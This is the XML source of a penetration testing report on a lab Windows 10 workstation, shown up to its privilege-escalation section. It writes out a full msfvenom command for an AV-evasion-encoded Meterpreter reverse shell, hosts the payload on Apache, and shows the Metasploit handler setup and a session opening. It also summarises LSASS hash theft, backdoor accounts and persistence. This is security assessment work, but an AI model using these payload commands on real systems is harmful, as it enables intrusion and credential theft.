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80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Attack-Chain Simulation — Windows 10 Target System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  CLASSIFICATION: CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">This document contains sensitive security assessment findings and is intended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">exclusively for authorised personnel directly involved in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="5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7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E"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dxa" w:w="320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Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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May 16, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Target IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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192.168.40.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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192.168.40.136 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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Windows 10 22H2+ (Build 19045)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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WORKGROUP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Overall Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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Internal Network Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document presents the outcomes of a security assessment carried out against a Windows 10 workstation (DESKTOP-AR0UM8P, IP 192.168.40.140) within an isolated local network. The test was executed from a Kali Linux machine (192.168.40.136) and replicated a real-world, end-to-end compromise scenario — from initial payload delivery through to long-term persistence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment confirmed that a network-adjacent, unauthenticated attacker could achieve full system ownership (NT AUTHORITY\SYSTEM) by combining social-engineering-based payload delivery, exploitation of a disclosed vulnerability (CVE-2024-23692 in Rejetto HTTP File Server), and a series of post-exploitation actions.</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7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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1. Payload Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  Meterpreter reverse shell (.exe) built and hosted for delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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2. Initial Foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  Target executed payload; active session established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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3. Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  Full SYSTEM-level access obtained via Named Pipe Impersonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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4. Credential Acquisition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  NTLM password hashes extracted from LSASS memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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5. Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  RDP activated; backdoor admin account added; CVE-2024-23692 exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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6. Persistent Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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  Self-starting Meterpreter service implanted; survives reboots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Phase 1 — Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1  Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The engagement began with crafting a malicious Windows executable configured to open a reverse shell back to the attacker's listener. The Metasploit Framework utility msfvenom was used to produce the payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  Technical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7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E"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dxa" w:w="320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Payload Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Output Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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Malware1122.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Callback IP (LHOST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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192.168.40.136</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Callback Port (LPORT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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1122</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Encoding Iterations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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100 (AV-evasion encoding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Target Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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x86 (auto-selected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Final File Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="616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354 bytes → 7,168 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3  Generation Command</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msfvenom -p windows/meterpreter/reverse_tcp \</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LHOST=192.168.40.136 \</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LPORT=1122 \</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-f exe -i 100 &gt; Malware1122.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4  Delivery Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The generated binary was placed in the Apache web-server document root and served over HTTP, simulating a drive-by download or social-engineering scenario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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mv Malware1122.exe /var/www/html</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service apache2 start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5  Listener Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A Metasploit multi/handler was configured to accept the incoming reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msf &gt; use multi/handler</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msf exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</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msf exploit(multi/handler) &gt; set LHOST 192.168.40.136</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msf exploit(multi/handler) &gt; set LPORT 1122</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msf exploit(multi/handler) &gt; exploit</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Started reverse TCP handler on 192.168.40.136:1122</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="7B5800" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF8E1" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7B5800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: The payload was produced without commercial-grade obfuscation. Modern EDR solutions with behavioural analysis would likely flag this binary at execution time. In environments lacking endpoint protection, however, this technique remains effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Phase 2 — Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Initial Session &amp; Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the target executed the payload, a Meterpreter session was opened. Immediate reconnaissance confirmed the operating environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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Meterpreter session 1 opened (192.168.40.136:1122 -&gt; 192.168.40.140:64626)</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meterpreter &gt; sysinfo</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Computer        : DESKTOP-AR0UM8P</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OS              : Windows 10 22H2+ (10.0 Build 19045)</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Architecture    : x64</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System Language : en_US</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Domain          : WORKGROUP</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Logged On Users : 2</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Meterpreter     : x86/windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  Privilege Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The initial session ran under limited user rights. The getprivs command confirmed the absence of key administrative privileges such as SeDebugPrivilege and SeTakeOwnershipPrivilege.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
